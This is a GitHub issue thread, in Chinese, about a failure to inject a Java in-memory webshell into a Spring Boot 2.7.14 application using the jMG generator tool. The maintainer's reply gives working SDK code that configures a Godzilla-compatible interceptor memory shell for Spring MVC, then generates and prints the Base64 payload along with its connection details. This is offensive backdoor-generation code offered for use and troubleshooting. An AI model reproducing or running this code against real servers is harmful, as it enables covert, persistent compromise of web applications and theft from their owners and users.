Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Spring Boot注入内存马失败 #28

Open
Und3r1ine opened this issue Aug 11, 2024 · 1 comment
Open

Spring Boot注入内存马失败 #28

Und3r1ine opened this issue Aug 11, 2024 · 1 comment

Comments

@Und3r1ine
Copy link

spring boot的版本

<parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.7.14</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>

spring boot中tomcat的版本是:tomcat-embed-core-9.0.78.jar

控制台报错信息是:

org.springframework.web.util.NestedServletException: Request processing failed; nested exception is java.lang.ClassCastException: org.apache.logging.h.JSONUtil cannot be cast to org.springframework.web.servlet.HandlerInterceptor

org.apache.logging.h.JSONUtil是生成的注入器类名

@pen4uin
Copy link
Owner

pen4uin commented Aug 24, 2024

这个报错应该不影响连接吧?我这边使用以下配置没问题,你再确认下?

import jmg.core.config.AbstractConfig;
import jmg.core.config.Constants;
import jmg.sdk.jMGenerator;
import jmg.sdk.util.SDKResultUtil;

public class SDKTest {
    public static void main(String[] args) throws Throwable {
        // 必需的基础配置
        AbstractConfig config = new AbstractConfig() {{
            // 设置工具类型
            setToolType(Constants.TOOL_GODZILLA);
            // 设置中间件 or 框架
            setServerType(Constants.SERVER_SPRING_MVC);
            // 设置内存马类型
            setShellType(Constants.SHELL_INTERCEPTOR);
            // 设置输出格式为 BASE64
            setOutputFormat(Constants.FORMAT_BASE64);
            // 设置漏洞利用封装,默认不启用
            setGadgetType(Constants.GADGET_NONE);
            // 初始化基础配置
            build();
        }};

        // 生成 payload
        jMGenerator generator = new jMGenerator(config);
        generator.genPayload();
        generator.printPayload();
        
        // 打印连接信息
        SDKResultUtil.printBasicInfo(config);
        SDKResultUtil.printDebugInfo(config);
    }
}
image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants